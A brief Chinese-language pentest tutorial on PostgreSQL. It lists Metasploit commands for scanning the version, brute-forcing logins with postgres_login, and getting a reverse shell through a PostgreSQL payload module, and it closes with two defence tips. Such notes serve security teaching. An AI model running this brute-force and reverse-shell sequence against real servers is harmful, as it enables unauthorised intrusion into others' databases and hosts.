postgresql介绍
- postgresql是对象基础型数据库管理系统,支持大部分SQL标准并且提供了许多其他的现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。
- 一般使用的是5432端口号。
- https://www.postgresql.org/
探测postgresqlkeyi
- nmap -sV 目标IP地址 -p 5432
- 探测目标postgresql版本信息。
- msf下postgres_version也可以查看
- msf更加精细化
- 因为探测都有误差,只能大概探测
暴力破解
- 在msf下使用postgresql_login模块,破解系统登陆用户名和密码。
- msfconsole
- use ausliary/scanner/postgres/postgres_login
- show options
- 用set设置rhost、username/user_file、password/pass_file
- show options
- exploit/run
登录postgresql
- 使用pyadmin客户端软件登录postgresql。
postgresql代码执行利用
- 利用msf下postgresql的代码执行获得反弹shell。
- msfconsole
- search postgresql
- use exploit/linux/postgres/postgrespayload
- show info 查看模块信息
- set rhosts、lhosts
- run
防御
- 屏蔽任意IP连接postgresql
- 升级版本,安全配置。